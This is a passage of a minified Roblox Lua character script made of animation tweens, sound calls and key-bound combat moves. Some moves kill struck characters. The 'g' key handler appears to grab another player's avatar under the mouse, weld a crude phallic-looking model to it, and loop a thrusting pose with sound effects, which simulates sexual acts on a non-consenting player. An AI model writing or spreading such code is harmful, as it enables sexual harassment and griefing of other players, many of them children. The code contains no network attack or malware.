h3=EffectPack.Spark:Clone()h3.Parent=h1;h3:Emit(1)game:GetService("Debris"):AddItem(h1,2)end))so("782353117",Torso,2,0.9)so("588738949",RightArm,3,math.random(90,110)/100)so("588738949",LeftArm,3,math.random(90,110)/100)SetTween(hI,{C0=RootCF*CFrame.new(0,0,0)*angles(math.rad(-65),math.rad(0),math.rad(-0))},"Back","Out",0.3)SetTween(hJ,{C0=NeckCF*CFrame.new(0,0,0)*angles(math.rad(65),math.rad(0),math.rad(0))},"Back","Out",0.3)SetTween(RW,{C0=CFrame.new(1.5,0.5,-.0)*angles(math.rad(90),math.rad(0),math.rad(90))},"Back","Out",0.3)SetTween(LW,{C0=CFrame.new(-1.5,0.5,-.0)*angles(math.rad(90),math.rad(0),math.rad(-90))},"Back","Out",0.3)SetTween(RH,{C0=CFrame.new(.5,-.7,-.2)*angles(math.rad(-40),math.rad(0),math.rad(0))},"Back","Out",0.3)SetTween(LH,{C0=CFrame.new(-.5,-1,0)*angles(math.rad(-30),math.rad(0),math.rad(0))},"Back","Out",0.3)SetTween(l5,{C0=CFrame.new(0,-30,5)},"Back","Out",0.6)for T=1,3 do SetTween(head,{CFrame=RootPart.CFrame*CF(0,0,-6)*angles(mr(0),mr(180),mr(0))},"Linear","Out",0.1)Swait(0.1*30)end;for T=1,2.5,.225 do SetTween(hI,{C0=RootCF*CFrame.new(0,2+-0.75*T,20-1.8*T)*angles(math.rad(15+30*T*2),math.rad(0),math.rad(-0))},"Quad","Out",0.2)SetTween(hJ,{C0=NeckCF*CFrame.new(0,0,0)*angles(math.rad(-25),math.rad(0),math.rad(0))},"Quad","Out",0.3)SetTween(RW,{C0=CFrame.new(1.5,0.5,-.0)*angles(math.rad(170),math.rad(0),math.rad(90-90/2.0*T))},"Quad","Out",0.2)SetTween(LW,{C0=CFrame.new(-1.5,0.5,-.0)*angles(math.rad(170),math.rad(0),math.rad(-90+90/2.0*T))},"Quad","Out",0.2)SetTween(RH,{C0=CFrame.new(.5,-1,0)*angles(math.rad(40),math.rad(0),math.rad(0))},"Quad","Out",0.3)SetTween(LH,{C0=CFrame.new(-.5,-1,-0)*angles(math.rad(40),math.rad(0),math.rad(0))},"Quad","Out",0.3)Swait()SetTween(l5,{C0=CFrame.new(0,-(20-1.8*T),13-1.2*T)},"Quad","Out",0.2)end;so("231917750",Torso,5,0.9)local kZ=Instance.new("Attachment",Torso)kZ.Orientation=Vector3.new(0,0,0)kZ.Position=Vector3.new(0,0,0)local h4=EffectPack.SmashSmoke:Clone()h4.Parent=kZ;h4.Enabled=true;game:GetService("Debris"):AddItem(kZ,7)coroutine.resume(coroutine.create(function()local l7=c.Parent;c.Parent=Effects;local l8,l9,ih=rayCast(Torso.Position,CFrame.new(Torso.Position,(RootPart.CFrame*CF(0,-4,-10)).p).lookVector,54,Character)c.Parent=l7;SetTween(head,{CFrame=cf(l9-VT(0,0,0),Torso.Position)*angles(mr(0),mr(180),mr(-45))},"Quad","In",0.3)Swait(.3*30)so("231917744",head,4,1.25)BulletHitEffectSpawn(CF(l9,l9+ih),"Explode")end))coroutine.resume(coroutine.create(function()Swait(0.3*30)if c:FindFirstChild("UpperTorso")then local ragdoll=EffectPack.R15Ragdoll:Clone()ragdoll.Parent=c;ragdoll.Disabled=false else local ragdoll=EffectPack.R6Ragdoll:Clone()ragdoll.Parent=c;ragdoll.Disabled=false end;c:BreakJoints()h.Health=0;head.Anchored=false end))SetTween(l5,{C0=CFrame.new(0,0,27)},"Quad","In",0.3)SetTween(hI,{C0=RootCF*CFrame.new(0,-0,-.5)*angles(math.rad(85),math.rad(0),math.rad(-0))},"Quad","Out",0.2)SetTween(hJ,{C0=NeckCF*CFrame.new(0,0,0)*angles(math.rad(-65),math.rad(0),math.rad(0))},"Back","Out",0.2)SetTween(RW,{C0=CFrame.new(1.5,0.5,-.0)*angles(math.rad(130),math.rad(0),math.rad(0))},"Back","Out",0.2)SetTween(LW,{C0=CFrame.new(-1.5,0.5,-.0)*angles(math.rad(130),math.rad(0),math.rad(-0))},"Back","Out",0.2)SetTween(RH,{C0=CFrame.new(.5,-1,0)*angles(math.rad(-25),math.rad(0),math.rad(0))},"Back","Out",0.2)SetTween(LH,{C0=CFrame.new(-.5,-1,0)*angles(math.rad(-25),math.rad(0),math.rad(0))},"Back","Out",0.2)Swait(0.3*30)h4.Enabled=false;SetTween(hI,{C0=RootCF*CFrame.new(0,-0,0)*angles(math.rad(-0),math.rad(0),math.rad(-0))},"Quad","Out",0.25)SetTween(hJ,{C0=NeckCF*CFrame.new(0,0,0)*angles(math.rad(35),math.rad(0),math.rad(0))},"Back","Out",0.25)SetTween(RW,{C0=CFrame.new(1.5,0.5,-.0)*angles(math.rad(30),math.rad(0),math.rad(30))},"Back","Out",0.25)SetTween(LW,{C0=CFrame.new(-1.5,0.5,-.0)*angles(math.rad(30),math.rad(0),math.rad(-30))},"Back","Out",0.25)SetTween(RH,{C0=CFrame.new(.5,-1,0)*angles(math.rad(10),math.rad(0),math.rad(0))},"Back","Out",0.25)SetTween(LH,{C0=CFrame.new(-.5,-1,0)*angles(math.rad(-10),math.rad(0),math.rad(0))},"Back","Out",0.25)Swait(0.25*30)l4:Destroy()dS=false end end end;local la=k_.Touched:connect(onTouch)Swait(.5*30)if k_.Parent==Effects then la:disconnect()k_:Destroy()dS=false end;while true do Swait()if dS==false then break end end;print("aaaaaaaaaaaaaaaaaa")la:disconnect()Humanoid.JumpPower=60;Humanoid.WalkSpeed=16 end;function Attack6()for T,v in pairs(GatherAllInstances(Effects))do if v.Name=="Zombie"then v.Parent:Destroy()end end end;function ClickCombo()if N=="Fall"or N=="Jump"then if Combo==0 then end else if ke==false then if Combo==0 then AT1()Combo=1 elseif Combo==1 then AT2()Combo=2 elseif Combo==2 then AT3()Combo=0 elseif Combo==3 then Combo=0;ClickCombo()end else if Combo==0 then AT4()Combo=1 elseif Combo==1 then AT5()Combo=2 elseif Combo==2 then AT6()Combo=3 elseif Combo==3 then AT7()Combo=0 end end end end;local lb=Instance.new('IntValue',nil)for T,v in pairs(Character.TorsoYes.Torso:GetChildren())do if v:IsA('Part')and v.Name=="Chest"then lb.Value=lb.Value+1;v.Name="Chest"..lb.Value end end;local Hold=false;mouse.Button1Down:connect(function()Hold=true;while Hold==true do if dS==false then ClickCombo()else end;Swait()end end)mouse.Button1Up:connect(function()if Hold==true then Hold=false end end)mouse.KeyUp:connect(function(dr)end)mouse.KeyDown:connect(function(dr)if dr=="f"and dS==false and kf==false then if ke==false then SetTween(RCW,{C0=CF(0,-.75,0)},"Quad","Out",.5)SetTween(LCW,{C0=CF(0,-.75,0)},"Quad","Out",.5)ke=true;so("3051417649",RightArm,1.5,.8)so("3051417649",LeftArm,1.5,.8)else SetTween(RCW,{C0=CF(0,-0,0)},"Quad","In",.5)SetTween(LCW,{C0=CF(0,-0,0)},"Quad","In",.5)ke=false;so("3051417791",RightArm,1.5,.8)so("3051417791",LeftArm,1.5,.8)end end;if dr=="f"and dS==false and kf==true then if ke==false then SetTween(RCW,{C0=CF(0,-.75,0)},"Quad","Out",.5)SetTween(LCW,{C0=CF(0,-.75,0)},"Quad","Out",.5)ke=true;so("3051417649",RightArm,1.5,.8)so("3051417649",LeftArm,1.5,.8)else SetTween(RCW,{C0=CF(0,-0,0)},"Quad","In",.5)SetTween(LCW,{C0=CF(0,-0,0)},"Quad","In",.5)ke=false;so("3051417791",RightArm,1.5,.8)so("3051417791",LeftArm,1.5,.8)end end;if dr=='e'and dS==false then dS=true;local lc=true;while lc==true do SetTween(hI,{C0=RootCF*CFrame.new(0,0,-2.20)*angles(math.rad(75),math.rad(5*math.cos(dQ/8)),math.rad(5*math.cos(dQ/8)))},"Linear","InOut",0.1)SetTween(hJ,{C0=NeckCF*CFrame.new(0,0,0)*angles(math.rad(-40),math.rad(15*math.sin(dQ/8)),math.rad(0))},"Linear","InOut",0.1)SetTween(RW,{C0=CFrame.new(1.0,0.5,-.4)*angles(math.rad(160),math.rad(5*math.cos(dQ/8)),math.rad(-50+5*math.cos(dQ/8)))},"Linear","Out",0.1)SetTween(LW,{C0=CFrame.new(-1.0,0.5,-.4)*angles(math.rad(160),math.rad(5*math.cos(dQ/8)),math.rad(40+5*math.cos(dQ/8)))},"Linear","Out",0.1)SetTween(RH,{C0=CFrame.new(.5,-.9-.1*math.cos(dQ/8),-.4+.4*math.cos(dQ/8))*angles(math.rad(-50+35*math.cos(dQ/8)),math.rad(5*math.cos(dQ/8)),math.rad(-15*math.cos(dQ/8)))},"Linear","InOut",0.1)SetTween(LH,{C0=CFrame.new(-.5,-.9+.1*math.cos(dQ/8),-.4-.4*math.cos(dQ/8))*angles(math.rad(-50-35*math.cos(dQ/8)),math.rad(5*math.cos(dQ/8)),math.rad(-15*math.cos(dQ/8)))},"Linear","InOut",0.1)SetTween(tailw,{C0=CF(-.2*math.cos(dQ/8),0,.30+.15*math.sin(dQ/4))*ANGLES(mr(80+10*math.sin(dQ/4)),mr(10*math.cos(dQ/8)),mr(10-30*math.cos(dQ/8)))},"Linear","In",.1)Swait()if(Humanoid.MoveDirection*Vector3.new(1,0,1)).magnitude>.5 then lc=false end end;dS=false end;if dr=="r"and dS==false and kf==false then dS=true;local lc=true;while lc==true do SetTween(hI,{C0=RootCF*CFrame.new(0,0,-2.20)*angles(math.rad(75),math.rad(5*math.cos(dQ/8)),math.rad(5*math.cos(dQ/8)))},"Linear","InOut",0.1)SetTween(hJ,{C0=NeckCF*CFrame.new(0,0,0)*angles(math.rad(-40),math.rad(15*math.sin(dQ/8)),math.rad(0))},"Linear","InOut",0.1)SetTween(RW,{C0=CFrame.new(1.0,0.5,-.4)*angles(math.rad(160),math.rad(5*math.cos(dQ/8)),math.rad(-50+5*math.cos(dQ/8)))},"Linear","Out",0.1)SetTween(LW,{C0=CFrame.new(-1.0,0.5,-.4)*angles(math.rad(160),math.rad(5*math.cos(dQ/8)),math.rad(40+5*math.cos(dQ/8)))},"Linear","Out",0.1)SetTween(RH,{C0=CFrame.new(.5,-.9-.1*math.cos(dQ/8),-.4+.4*math.cos(dQ/8))*angles(math.rad(-50+35*math.cos(dQ/8)),math.rad(5*math.cos(dQ/8)),math.rad(-15*math.cos(dQ/8)))},"Linear","InOut",0.1)SetTween(LH,{C0=CFrame.new(-.5,-.9+.1*math.cos(dQ/8),-.4-.4*math.cos(dQ/8))*angles(math.rad(-50-35*math.cos(dQ/8)),math.rad(5*math.cos(dQ/8)),math.rad(-15*math.cos(dQ/8)))},"Linear","InOut",0.1)SetTween(tailw,{C0=CF(-.2*math.cos(dQ/8),0,.30+.15*math.sin(dQ/4))*ANGLES(mr(80+10*math.sin(dQ/4)),mr(10*math.cos(dQ/8)),mr(10-30*math.cos(dQ/8)))},"Linear","In",.1)Swait()if(Humanoid.MoveDirection*Vector3.new(1,0,1)).magnitude>.5 then lc=false end end;dS=false end;if dr=="r"and dS==false and kf==true then dS=true;local lc=true;while lc==true do SetTween(hI,{C0=RootCF*CFrame.new(0,0,-1.8)*angles(math.rad(140),math.rad(5*math.cos(dQ/8)),math.rad(5*math.cos(dQ/8)))},"Linear","InOut",0.1)SetTween(hJ,{C0=NeckCF*CFrame.new(0,0,0)*angles(math.rad(-100),math.rad(15*math.sin(dQ/8)),math.rad(0))},"Linear","InOut",0.1)SetTween(RW,{C0=CFrame.new(1.0,1,0)*angles(math.rad(210),math.rad(5*math.cos(dQ/8)),math.rad(40+5*math.cos(dQ/8)))},"Linear","Out",0.1)SetTween(LW,{C0=CFrame.new(-1.0,1,0)*angles(math.rad(210),math.rad(5*math.cos(dQ/8)),math.rad(-40+5*math.cos(dQ/8)))},"Linear","Out",0.1)SetTween(RH,{C0=CFrame.new(.5,-0.7,0)*angles(math.rad(130+5*math.cos(dQ/8)),math.rad(15*math.sin(dQ/8)),math.rad(-15*math.cos(dQ/8)))},"Linear","InOut",0.1)SetTween(LH,{C0=CFrame.new(-.5,-0.7,0)*angles(math.rad(130-5*math.cos(dQ/8)),math.rad(-15*math.sin(dQ/8)),math.rad(-15*math.cos(dQ/8)))},"Linear","InOut",0.1)SetTween(tailw,{C0=CF(-.2*math.cos(dQ/8),0,.30+.15*math.sin(dQ/4))*ANGLES(mr(80+10*math.sin(dQ/4)),mr(10*math.cos(dQ/8)),mr(10-30*math.cos(dQ/8)))},"Linear","In",.1)Swait()if(Humanoid.MoveDirection*Vector3.new(1,0,1)).magnitude>.5 then lc=false end end;dS=false end;if dr=="z"and dS==false then Attack1()end;if dr=="x"and dS==false then end;if dr=="c"and dS==false then end;if dr=="v"and dS==false then end;if dr=="f"and dS==false then end;if dr=="y"and dS==false then joke()end;if dr=="t"and dS==false then dS=true;SetTween(hI,{C0=RootCF*CFrame.new(0,0,0)*angles(math.rad(0),math.rad(0),math.rad(30))},"Back","Out",0.3)SetTween(hJ,{C0=NeckCF*CFrame.new(0,0,0)*angles(math.rad(0),math.rad(0),math.rad(-30))},"Back","Out",0.3)SetTween(RW,{C0=CFrame.new(1.3,0.5,-.0)*angles(math.rad(120),math.rad(0),math.rad(-40))},"Back","Out",0.3)SetTween(LW,{C0=CFrame.new(-1.5,0.5,-.0)*angles(math.rad(0),math.rad(0),math.rad(0))},"Back","Out",0.3)SetTween(RH,{C0=CFrame.new(.5,-1,0)*angles(math.rad(0),math.rad(0),math.rad(0))},"Back","Out",0.3)SetTween(LH,{C0=CFrame.new(-.5,-1,0)*angles(math.rad(0),math.rad(0),math.rad(0))},"Back","Out",0.3)Swait(.3*30)so("875978120",Torso,4,.9)dR=4.3;for T=1,4,0.1 do SetTween(hI,{C0=RootCF*CFrame.new(0,0,-.1-.05*math.cos(dQ/8))*angles(math.rad(1+1*math.cos(dQ/8)),math.rad(0),math.rad(30+1*math.cos(dQ/8)))},"Quad","InOut",0.1)SetTween(hJ,{C0=NeckCF*CFrame.new(0,0,0)*angles(math.rad(0),math.rad(0),math.rad(-30+1*math.cos(dQ/8)))},"Quad","InOut",0.1)SetTween(RW,{C0=CFrame.new(1.3,0.5,-.0)*angles(math.rad(120),math.rad(0),math.rad(-40))},"Quad","InOut",0.1)SetTween(LW,{C0=CFrame.new(-1.5,0.5,-.0)*angles(math.rad(0),math.rad(0),math.rad(0))},"Quad","InOut",0.1)SetTween(RH,{C0=CFrame.new(.5,-.95+.05*math.cos(dQ/8),-.2+.05*math.cos(dQ/8))*angles(math.rad(-10+1*math.cos(dQ/8)),math.rad(25*math.cos(dQ/16)),math.rad(0))},"Quad","InOut",0.1)SetTween(LH,{C0=CFrame.new(-.5,-.95+.05*math.cos(dQ/8),0)*angles(math.rad(1+1*math.cos(dQ/8)),math.rad(0),math.rad(0))},"Quad","InOut",0.1)Swait()end;dS=false end;if dr=="g"and ki==true and kh==true then ki=false end;if dr=="g"and dS==false and kh==false and kf==true then dS=true;ki=true;local ld=mouse.Target;if ld.Parent~=nil then local ji=ld.Parent:FindFirstChild("HumanoidRootPart")or ld.Parent.Parent:FindFirstChild("HumanoidRootPart")local le=ld.Parent:FindFirstChildOfClass("Humanoid")or ld.Parent.Parent:FindFirstChildOfClass("Humanoid")if ji==nil then ji=ld.Parent:FindFirstChild("Torso")or ld.Parent.Parent:FindFirstChild("Torso")end;print(ji,le)if ji==nil or le==nil then dS=false end;if ji~=nil and le~=nil then local lf=ji;RootPart.Anchored=true;local hum=le;local lg=Instance.new("Part")local li=Instance.new("ParticleEmitter")lg.Parent=Player.Character;lg.CFrame=CFrame.new(51.1425285,1.88000441,-7.34444237,1,0,0,0,1,0,0,0,1)lg.Position=Vector3.new(51.1425285,1.88000441,-7.34444237)lg.Transparency=1;lg.Size=Vector3.new(5.54000139,3.71999788,4.06999826)lg.BottomSurface=Enum.SurfaceType.Smooth;lg.TopSurface=Enum.SurfaceType.Smooth;lg.CanCollide=false;lg.Anchored=true;li.Parent=lg;li.Speed=NumberRange.new(0.5,0.5)li.Rotation=NumberRange.new(0,360)li.Enabled=true;li.Texture="rbxassetid://244221440"li.Transparency=NumberSequence.new(0.89999997615814,0.89999997615814)li.ZOffset=5;li.Size=NumberSequence.new(3.7200000286102,3.7200000286102)li.Acceleration=Vector3.new(0,1,0)li.Lifetime=NumberRange.new(0.10000000149012,0.20000000298023)li.Rate=20000;li.RotSpeed=NumberRange.new(-30,30)li.SpreadAngle=Vector2.new(360,360)li.VelocitySpread=360;lg.CFrame=lf.CFrame*CFrame.Angles(0,0,math.rad(90))lg.CFrame=lg.CFrame*CFrame.new(0,0,-2)coroutine.resume(coroutine.create(function()wait(0.3)li.Enabled=false end))local lj=Instance.new("Model")local aA=Instance.new("Part")local kq=Instance.new("SpecialMesh")local kr=Instance.new("Weld")local Part4=Instance.new("Part")local lk=Instance.new("Weld")local Part6=Instance.new("Part")local ll=Instance.new("Weld")lj.Name="D"lj.Parent=nil;aA.Parent=lj;aA.CFrame=CFrame.new(60.5641861,1.69272184,-20.9960651,0.000150388281,0.0221676175,0.999754369,-1.6669499e-05,0.999754369,-0.0221676137,-1,-1.33316544e-05,0.000150720865)aA.Orientation=Vector3.new(1.26999998,89.9899979,0)aA.Position=Vector3.new(60.5641861,1.69272184,-20.9960651)aA.Rotation=Vector3.new(89.6100006,88.7300034,-89.6100006)aA.Color=Color3.new(0.745098,0.407843,0.384314)aA.Size=Vector3.new(0.0600000024,0.950895786,0.220896259)aA.BottomSurface=Enum.SurfaceType.Smooth;aA.BrickColor=BrickColor.new("Terra Cotta")aA.CanCollide=false;aA.Material=Enum.Material.SmoothPlastic;aA.TopSurface=Enum.SurfaceType.Smooth;aA.brickColor=BrickColor.new("Terra Cotta")kq.Parent=aA;kq.Scale=Vector3.new(0.910000026,0.300000012,0.910000026)kq.MeshType=Enum.MeshType.Sphere;kr.Name="Part"kr.Parent=aA;kr.C0=CFrame.new(-5.7220459e-05,-0.414992213,3.05175781e-05,3.20026317e-07,-1,5.29796484e-11,-1,-3.20026317e-07,-1.69109037e-15,1.70804522e-15,-5.29796484e-11,-1)kr.Part0=aA;kr.Part1=Part6;kr.part1=Part6;Part4.Parent=lj;Part4.CFrame=CFrame.new(60.5637436,1.67272615,-20.9960651,0.999754369,0.0221676175,-0.000150395441,-0.0221676137,0.999754369,1.63495533e-05,0.000150720924,-1.30116277e-05,1)Part4.Orientation=Vector3.new(0,-0.00999999978,-1.26999998)Part4.Position=Vector3.new(60.5637436,1.67272615,-20.9960651)Part4.Rotation=Vector3.new(0,-0.00999999978,-1.26999998)Part4.Color=Color3.new(1,0.580392,0.580392)Part4.Size=Vector3.new(0.310000956,0.310000956,0.310000956)Part4.BottomSurface=Enum.SurfaceType.Smooth;Part4.BrickColor=BrickColor.new("Salmon")Part4.Material=Enum.Material.SmoothPlastic;Part4.TopSurface=Enum.SurfaceType.Smooth;Part4.brickColor=BrickColor.new("Salmon")Part4.Shape=Enum.PartType.Ball;Part4.CanCollide=false;lk.Name="Part"lk.Parent=Part4;lk.C0=CFrame.new(2.67028809e-05,-0.394991755,5.7220459e-05,-3.47415857e-23,0,-1,-1,0,-3.47415857e-23,0,1,0)lk.Part0=Part4;lk.Part1=Part6;lk.part1=Part6;Part6.Parent=lj;Part6.CFrame=CFrame.new(60.5550156,1.27783084,-20.9960022,-0.0221676175,-0.000150395441,-0.999754369,-0.999754369,1.63495533e-05,0.0221676137,1.30116277e-05,1,-0.000150720924)Part6.Orientation=Vector3.new(-1.26999998,-90.0100021,-90)Part6.Position=Vector3.new(60.5550156,1.27783084,-20.9960022)Part6.Rotation=Vector3.new(-90.3899994,-88.7300034,179.610001)Part6.Color=Color3.new(1,0.8,0.6)Part6.Size=Vector3.new(0.789999664,0.315000653,0.315000653)Part6.BottomSurface=Enum.SurfaceType.Smooth;Part6.BrickColor=BrickColor.new("Pastel brown")Part6.Material=Enum.Material.SmoothPlastic;Part6.TopSurface=Enum.SurfaceType.Smooth;Part6.brickColor=BrickColor.new("Pastel brown")Part6.Shape=Enum.PartType.Cylinder;if lf.Name=="HumanoidRootPart"then Part6.BrickColor=lf.BrickColor elseif lf.Name~="HumanoidRootPart"then local lm=lf.Parent:FindFirstChildOfClass("BodyColors")if lm~=nil then Part6.BrickColor=lm.TorsoColor end end;Part6.CanCollide=false;ll.Name="HumanoidRootPart"ll.Parent=Part6;ll.C0=CFrame.new(0.749751091,-0.000104904175,-1.27482605,-1.30116277e-05,-0.0221676175,0.999754369,-1,-0.000150395441,-1.63495533e-05,0.000150720924,-0.999754369,-0.0221676137)ll.Part0=Part6;ll.Part1=lf;ll.part1=lf;wait(0.2)for T=0,0.1,0.1 do SetTween(hJ,{C0=NeckCF},"Quad","InOut",0.1)end;local ln=0;kh=true;spawn(function()tploop=game:GetService("RunService").RenderStepped:Connect(function()if kh==true then RootPart.CFrame=lf.CFrame*CFrame.new(0,-0.2,0)*angles(math.rad(-90),0,0)RootPart.CFrame=RootPart.CFrame*CFrame.new(0,1.5,0)*angles(0,math.rad(180),0)end end)while kh==true do wait()end;print("Ran")RootPart.Anchored=false;tploop:Disconnect()end)repeat ln=ln+1;for T=0,0.8,0.1 do SetTween(hI,{C0=CFrame.fromEulerAnglesXYZ(-2.9,0,3.14)},"Quad","InOut",0.1)SetTween(LH,{C0=CFrame.new(-.5,-.95+.05,0)*angles(math.rad(30),0,math.rad(-25))},"Quad","InOut",0.1)SetTween(RH,{C0=CFrame.new(.5,-.95+.05,0)*angles(math.rad(30),0,math.rad(25))},"Quad","InOut",0.1)SetTween(LW,{C0=CFrame.new(-1.5,0.4,-.0)*angles(math.rad(90),0,0)},"Quad","InOut",0.1)SetTween(RW,{C0=CFrame.new(1.5,0.4,-.0)*angles(math.rad(90),0,0)},"Quad","InOut",0.1)Swait()end;for T=0,0.8,0.1 do SetTween(hI,{C0=CFrame.fromEulerAnglesXYZ(-3.05,0,3.14)},"Quad","InOut",0.1)SetTween(LH,{C0=CFrame.new(-.5,-.95+.05,0)*angles(math.rad(45),0,math.rad(-25))},"Quad","InOut",0.1)SetTween(RH,{C0=CFrame.new(.5,-.95+.05,0)*angles(math.rad(45),0,math.rad(25))},"Quad","InOut",0.1)SetTween(LW,{C0=CFrame.new(-1.5,0.4,-.0)*angles(math.rad(100),0,0)},"Quad","InOut",0.1)SetTween(RW,{C0=CFrame.new(1.5,0.4,-.0)*angles(math.rad(100),0,0)},"Quad","InOut",0.1)Swait()end;local sound=CreateSound2("836796971",Torso,10,1,false)game:GetService("Debris"):AddItem(sound,2)wait(0.5)until ln>20 or ki==false;repeat ln=ln+1;for T=0,0.5,0.1 do SetTween(hI,{C0=CFrame.fromEulerAnglesXYZ(-2.9,0,3.14)},"Quad","InOut",0.1)SetTween(LH,{C0=CFrame.new(-.5,-.95+.05,0)*angles(math.rad(30),0,math.rad(-25))},"Quad","InOut",0.1)SetTween(RH,{C0=CFrame.new(.5,-.95+.05,0)*angles(math.rad(30),0,math.rad(25))},"Quad","InOut",0.1)SetTween(LW,{C0=CFrame.new(-1.5,0.4,-.0)*angles(math.rad(90),0,0)},"Quad","InOut",0.1)SetTween(RW,{C0=CFrame.new(1.5,0.4,-.0)*angles(math.rad(90),0,0)},"Quad","InOut",0.1)Swait()end;local sound=CreateSound2("836796971",Torso,10,1,false)game:GetService("Debris"):AddItem(sound,2)for T=0,0.5,0.1 do SetTween(hI,{C0=CFrame.fromEulerAnglesXYZ(-3.05,0,3.14)},"Quad","InOut",0.1)SetTween(LH,{C0=CFrame.new(-.5,-.95+.05,0)*angles(math.rad(45),0,math.rad(-25))},"Quad","InOut",0.1)SetTween(RH,{C0=CFrame.new(.5,-.95+.05,0)*angles(math.rad(45),0,math.rad(25))},"Quad","InOut",0.1)SetTween(LW,{C0=CFrame.new(-1.5,0.4,-.0)*angles(math.rad(100),0,0)},"Quad","InOut",0.1)SetTween(RW,{C0=CFrame.new(1.5,0.4,-.0)*angles(math.rad(100),0,0)},"Quad","InOut",0.1)Swait()end;wait(0.2)until ln>35 or ki==false;repeat wait()for T=0,0.4,0.1 do SetTween(hI,{C0=CFrame.fromEulerAnglesXYZ(-3,0,3.14)},"Quad","InOut",0.1)SetTween(LH,{C0=CFrame.new(-.5,-.95+.05,0)*angles(math.rad(35),0,math.rad(-25))},"Quad","InOut",0.1)SetTween(RH,{C0=CFrame.new(.5,-.95+.05,0)*angles(math.rad(35),0,math.rad(25))},"Quad","InOut",0.1)SetTween(LW,{C0=CFrame.new(-1.5,0.4,-.0)*angles(math.rad(90),0,0)},"Quad","InOut",0.1)SetTween(RW,{C0=CFrame.new(1.5,0.4,-.0)*angles(math.rad(90),0,0)},"Quad","InOut",0.1)Swait()end;local sound=CreateSound2("836796971",Torso,10,1,false)game:GetService("Debris"):AddItem(sound,5)for T=0,0.4,0.1 do SetTween(hI,{C0=CFrame.fromEulerAnglesXYZ(-2.7,0,3.14)},"Quad","InOut",0.1)SetTween(LH,{C0=CFrame.new(-.5,-.95+.05,0)*angles(math.rad(10),0,math.rad(-25))},"Quad","InOut",0.1)SetTween(RH,{C0=CFrame.new(.5,-.95+.05,0)*angles(math.rad(10),0,math.rad(25))},"Quad","InOut",0.1)SetTween(LW,{C0=CFrame.new(-1.5,0.4,-.0)*angles(math.rad(75),0,0)},"Quad","InOut",0.1)SetTween(RW,{C0=CFrame.new(1.5,0.4,-.0)*angles(math.rad(75),0,0)},"Quad","InOut",0.1)Swait()end;wait(0.1)until ki==false;for T=0,0.4,0.1 do SetTween(hI,{C0=CFrame.fromEulerAnglesXYZ(-3,0,3.14)},"Quad","InOut",0.1)SetTween(LH,{C0=CFrame.new(-.5,-.95+.05,0)*angles(math.rad(35),0,math.rad(-25))},"Quad","InOut",0.1)SetTween(RH,{C0=CFrame.new(.5,-.95+.05,0)*angles(math.rad(35),0,math.rad(25))},"Quad","InOut",0.1)SetTween(LW,{C0=CFrame.new(-1.5,0.4,-.0)*angles(math.rad(90),0,0)},"Quad","InOut",0.1)SetTween(RW,{C0=CFrame.new(1.5,0.4,-.0)*angles(math.rad(90),0,0)},"Quad","InOut",0.1)Swait()end;wait(0.5)for T=0,0.4,0.1 do SetTween(hI,{C0=CFrame.fromEulerAnglesXYZ(-2.65,0,3.14)},"Quad","InOut",0.1)SetTween(LH,{C0=CFrame.new(-.5,-.95+.05,0)*angles(math.rad(8),0,math.rad(-25))},"Quad","InOut",0.1)SetTween(RH,{C0=CFrame.new(.5,-.95+.05,0)*angles(math.rad(8),0,math.rad(25))},"Quad","InOut",0.1)SetTween(LW,{C0=CFrame.new(-1.5,0.4,-.0)*angles(math.rad(72),0,0)},"Quad","InOut",0.1)SetTween(RW,{C0=CFrame.new(1.5,0.4,-.0)*angles(math.rad(72),0,0)},"Quad","InOut",0.1)Swait()end;local sound=CreateSound2("1430568042",Torso,10,1,false)game:GetService("Debris"):AddItem(sound,5)wait(0.5)for T=0,0.4,0.1 do SetTween(hI,{C0=CFrame.fromEulerAnglesXYZ(-3,0,3.14)},"Quad","InOut",0.1)SetTween(LH,{C0=CFrame.new(-.5,-.95+.05,0)*angles(math.rad(35),0,math.rad(-25))},"Quad","InOut",0.1)SetTween(RH,{C0=CFrame.new(.5,-.95+.05,0)*angles(math.rad(35),0,math.rad(25))},"Quad","InOut",0.1)SetTween(LW,{C0=CFrame.new(-1.5,0.4,-.0)*angles(math.rad(90),0,0)},"Quad","InOut",0.1)SetTween(RW,{C0=CFrame.new(1.5,0.4,-.0)*angles(math.rad(90),0,0)},"Quad","InOut",0.1)Swait()end;wait(0.5)for T=0,0.4,0.1 do SetTween(hI,{C0=CFrame.fromEulerAnglesXYZ(-2.65,0,3.14)},"Quad","InOut",0.1)SetTween(LH,{C0=CFrame.new(-.5,-.95+.05,0)*angles(math.rad(8),0,math.rad(-25))},"Quad","InOut",0.1)SetTween(RH,{C0=CFrame.new(.5,-.95+.05,0)*angles(math.rad(8),0,math.rad(25))},"Quad","InOut",0.1)SetTween(LW,{C0=CFrame.new(-1.5,0.4,-.0)*angles(math.rad(72),0,0)},"Quad","InOut",0.1)SetTween(RW,{C0=CFrame.new(1.5,0.4,-.0)*angles(math.rad(72),0,0)},"Quad","InOut",0.1)Swait()end;local sound=CreateSound2("1430568042",Torso,10,1,false)game:GetService("Debris"):AddItem(sound,5)wait(0.5)for T=0,0.4,0.1 do SetTween(hI,{C0=CFrame.fromEulerAnglesXYZ(-3,0,3.14)},"Quad","InOut",0.1)SetTween(LH,{C0=CFrame.new(-.5,-.95+.05,0)*angles(math.rad(35),0,math.rad(-25))},"Quad","InOut",0.1)SetTween(RH,{C0=CFrame.new(.5,-.95+.05,0)*angles(math.rad(35),0,math.rad(25))},"Quad","InOut",0.1)SetTween(LW,{C0=CFrame.new(-1.5,0.4,-.0)*angles(math.rad(90),0,0)},"Quad","InOut",0.1)SetTween(RW,{C0=CFrame.new(1.5,0.4,-.0)*angles(math.rad(90),0,0)},"Quad","InOut",0.1)Swait()end;wait(0.5)for T=0,0.4,0.1 do SetTween(hI,{C0=CFrame.fromEulerAnglesXYZ(-2.65,0,3.14)},"Quad","InOut",0.1)SetTween(LH,{C0=CFrame.new(-.5,-.95+.05,0)*angles(math.rad(8),0,math.rad(-25))},"Quad","InOut",0.1)SetTween(RH,{C0=CFrame.new(.5,-.95+.05,0)*angles(math.rad(8),0,math.rad(25))},"Quad","InOut",0.1)SetTween(LW,{C0=CFrame.new(-1.5,0.4,-.0)*angles(math.rad(72),0,0)},"Quad","InOut",0.1)SetTween(RW,{C0=CFrame.new(1.5,0.4,-.0)*angles(math.rad(72),0,0)},"Quad","InOut",0.1)Swait()end;local 